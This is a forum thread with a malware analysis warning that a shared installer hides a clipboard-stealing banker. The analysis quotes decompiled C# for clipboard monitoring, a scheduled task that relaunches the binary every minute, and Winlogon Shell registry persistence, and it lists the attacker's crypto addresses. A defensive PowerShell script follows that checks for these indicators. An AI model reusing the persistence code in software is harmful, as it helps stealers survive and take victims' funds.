Thank you so much bre
Closed
#21
Posted 21 March 2020 - 04:23 AM
#23
Posted 21 March 2020 - 06:42 AM
INFECTED INFECTED INFECTED INFECTED
~ The file is not a .NET assembly, yet the DLLs are
~ It's a Windows Installer file
~ Requires admin privileges
~ When extracted, two files are presented to us
~ Build.sfx.exe is an archive
~ Once extracted, another file lies within it under the name "Build.exe"
~ Build.exe is a banker / stealer
~ Retrieves clipboard data and then logs it
~ Renames itself to "WinService.exe" and drops it in the user profile folder
Clipboard WinAPI imports:
    // Registers this window in the clipboard viewer chain so it is notified on every clipboard change
    [DllImport("User32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer);

    // Token: 0x06000018 RID: 24
    // Removes the window from the viewer chain again (cleanup on exit)
    [DllImport("User32.dll", CharSet = CharSet.Auto)]
    private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);
~ Has regular Shell startup and Task startup, so every minute the file will be executed. Dubbed "antikill"; very poor malware.
Task Startup:
    public static void AntiKill()
    {
        // Scheduled task "Windows Service" re-launches the binary (Program.Full2) every minute
        Process.Start(new ProcessStartInfo
        {
            FileName = "schtasks.exe",
            UseShellExecute = true,
            CreateNoWindow = false,
            WindowStyle = ProcessWindowStyle.Hidden,
            Arguments = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" + Program.Full2 + "\" /f"
        });
        // Hand off to the copy at Program.Full2 and exit the current process
        Process.Start(Program.Full2);
        Process.GetCurrentProcess().Kill();
    }
Regular Shell Startup:
    public static void StartUp()
    {
        // Per-user Winlogon Shell value: "explorer.exe, <path>" launches the binary alongside the shell at logon
        RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
        registryKey.SetValue("Shell", "explorer.exe, " + Program.Full2);
        try
        {
            // Same value machine-wide; only succeeds when running with admin privileges
            RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true);
            registryKey2.SetValue("Shell", "explorer.exe, " + Program.Full2);
        }
        catch
        {
        }
    }
~ Has two Crypto Addresses Linked to it
ETHEREUM: 0xD42A2Ab36f2fa44d5994BFC952978A254b18c8a0
BITCOIN: 3KjaxyBz6vW1m7QWYyyDKd1CwVzqtM6nFD
~ Looks like only the BTC stealer action is in play; there is no linked IP address to send the rest of the data to
~ BUILD.exe Scan: https://www.virustot...cf8b3/detection
Send Samples to be looked at
I think you know what's going on
Have a good day
Also bring back the Malicious section ....
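As an added example (not code from the original post or from the sample), the following PowerShell audit checks a host for the three persistence and drop artefacts the analysis above describes: a Winlogon Shell value that is anything other than plain explorer.exe (either hive), a scheduled task that repeats every minute or carries the "Windows Service" name, and a WinService.exe under the user profile. It assumes a Windows host with PowerShell 5.1 or later and the built-in ScheduledTasks module; the task name and file name are taken from the post, everything else is a generic check. It does not cover the clipboard viewer registration, which only shows up in live process analysis.

```powershell
# Added defensive audit, not code from the original post or from the sample.
# Assumptions: Windows, PowerShell 5.1+, ScheduledTasks module available.
# "Windows Service" (task name) and WinService.exe (dropped file) come from the analysis above.

function Get-WinlogonShellFindings {
    # Winlogon\Shell is normally exactly "explorer.exe". The sample writes
    # "explorer.exe, <path>", so any extra content after the shell name is suspicious.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
        $shell = (Get-ItemProperty -Path $key -Name Shell -ErrorAction SilentlyContinue).Shell
        if ($shell -and $shell.Trim() -ne 'explorer.exe') {
            [pscustomobject]@{ Source = "$hive Winlogon\Shell"; Detail = $shell }
        }
    }
}

function Get-SuspiciousTaskFindings {
    # schtasks /create /sc MINUTE /mo 1 yields a trigger whose repetition interval is PT1M (ISO 8601).
    # The task name used by the sample is also flagged on its own.
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $repeatsEveryMinute = $false
        foreach ($trigger in $task.Triggers) {
            if ($trigger.Repetition -and $trigger.Repetition.Interval -eq 'PT1M') { $repeatsEveryMinute = $true }
        }
        if ($repeatsEveryMinute -or $task.TaskName -eq 'Windows Service') {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            [pscustomobject]@{
                Source = "Task '$($task.TaskName)' ($($task.TaskPath))"
                Detail = $actions
            }
        }
    }
}

function Get-DroppedFileFindings {
    # The post reports the renamed copy landing in the user profile folder.
    $dropped = Join-Path $env:USERPROFILE 'WinService.exe'
    if (Test-Path -LiteralPath $dropped) {
        [pscustomobject]@{ Source = 'Dropped file'; Detail = $dropped }
    }
}

$findings = @(Get-WinlogonShellFindings) + @(Get-SuspiciousTaskFindings) + @(Get-DroppedFileFindings)
if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No Winlogon Shell, one-minute task, or WinService.exe indicators found.'
}
```

Run it from an elevated prompt so that every scheduled task is enumerated; the registry and file checks work unprivileged. A hit on HKLM Winlogon\Shell means the sample had admin rights when it ran, matching the try/catch around the LocalMachine write in the decompiled StartUp() above.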
#26
Posted 21 March 2020 - 10:00 PM
#27
Posted 22 March 2020 - 03:25 AM
#30
Posted 22 March 2020 - 05:48 AM